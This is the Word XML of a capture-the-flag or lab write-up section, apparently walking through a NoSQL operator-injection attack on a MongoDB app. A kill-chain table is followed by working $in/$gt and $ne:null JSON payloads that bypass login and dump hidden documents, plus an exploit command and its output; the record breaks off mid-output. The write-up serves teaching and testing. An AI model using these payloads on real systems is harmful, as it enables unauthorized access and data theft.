    <w:p w14:paraId="164913C8" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00E13696"/>
    <w:p w14:paraId="0C88AA70" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>5.4 Kill Chain &amp; Exploitation Walkthrough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E13696" w14:paraId="01ACBF38" w14:textId="77777777">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1FF48CD" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Kill Chain Phase</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998D090" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>MITRE ATT&amp;CK</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4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6861A54" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Action</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E13696" w14:paraId="6D33A06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306B62" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Reconnaissance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94769A" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>T1190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96E749" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Attacker reads / to discover three API endpoints: /login, /documents, /search</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E13696" w14:paraId="2BA78724"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709C804D" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Weaponization</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EF30CDF" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>T1078</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4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D41AD71" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Prepares $in + $</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>gt</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> payload for login bypass and $ne for access control bypass</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E13696" w14:paraId="0685DF1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F847AB" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Delivery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E251EC" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>T1190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6DACAB" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Sends POST /login with JSON operator payload</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E13696" w14:paraId="3DC77EFE"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8CCF77B" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Exploitation</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A3F205F" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>T1110.001</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4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72C9AB8F" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>MongoDB executes operators; admin account returned without valid password</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E13696" w14:paraId="5C42DC3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5F9B6F" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Installation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DABDE6" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>T1078</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B412D3" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Real admin username extracted from Welcome message in response</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E13696" w14:paraId="0CBC2416"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C068F89" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Actions on Objective</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72BD29AC" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>T1530</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4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DF4A072" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>POST /search with $</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>ne:null</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> returns all documents including hidden system flag</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="28C11E56" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00E13696"/>
    <w:p w14:paraId="13B58184" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>The 3-Operator Attack Chain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3536683D" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t>Send $in + $</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t>gt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t xml:space="preserve"> to /login — bypass authentication AND discover the real admin username in one request:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0349CA59" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F6F7"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>POST /login</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40E4782C" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F6F7"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17E3008A" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F6F7"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    "username</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>": {</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"$in": ["admin", "administrator", "root", "superuser</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"]}</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A985C5C" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F6F7"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    "password</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>": {</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"$</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>gt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>": "</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="421C3866" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F6F7"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FAC6803" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F6F7"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>→ Response: "Welcome, admin!"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="241F1575" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t xml:space="preserve">Send $ne: null to /search as </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t>doc_owner</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t xml:space="preserve"> — bypass access control and retrieve ALL documents:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5786DF3A" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F6F7"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>POST /search</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C2E96F9" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F6F7"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5262C5AB" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F6F7"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    "username": "admin",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32460AA9" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F6F7"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>doc</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>_owner</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>": {</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"$ne": null}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4413D18E" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F6F7"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="475B1E76" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F6F7"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>→ Returns: all documents including owner "system" with FLAG content</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DAC6199" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t>Flag is contained in the system-owned document, which is normally unreachable through the application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2928DE0F" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00E13696"/>
    <w:p w14:paraId="1FDBB720" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1B3A6B"/>
        </w:rPr>
        <w:t>Why the Flag Was Hidden:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B0CF9A7" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t xml:space="preserve">The system user has no login account, so /login cannot be used to access it. The /documents endpoint only returns documents belonging to the authenticated user. The /search endpoint was the only path to system documents — and it was wide open to operator </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t>injection</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BD249E5" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00E13696"/>
    <w:p w14:paraId="5D69A1F1" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1B3A6B"/>
        </w:rPr>
        <w:t>Exploit Command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38768CE4" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F6F7"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>python vuln3/solve/exploit.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3707E7B6" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00E13696"/>
    <w:p w14:paraId="455105A3" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1B3A6B"/>
        </w:rPr>
        <w:t>Expected Output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="505213DB" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F6F7"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>[+] Bypassed login!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77D0A9FF" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F6F7"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>[+] Real username discovered: 'admin'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B169BFE" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F6F7"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>[+] Got 4 document(</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>s) —</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> all owners exposed:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D6B1898" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F6F7"/>
        <w:ind w:left="720"/>
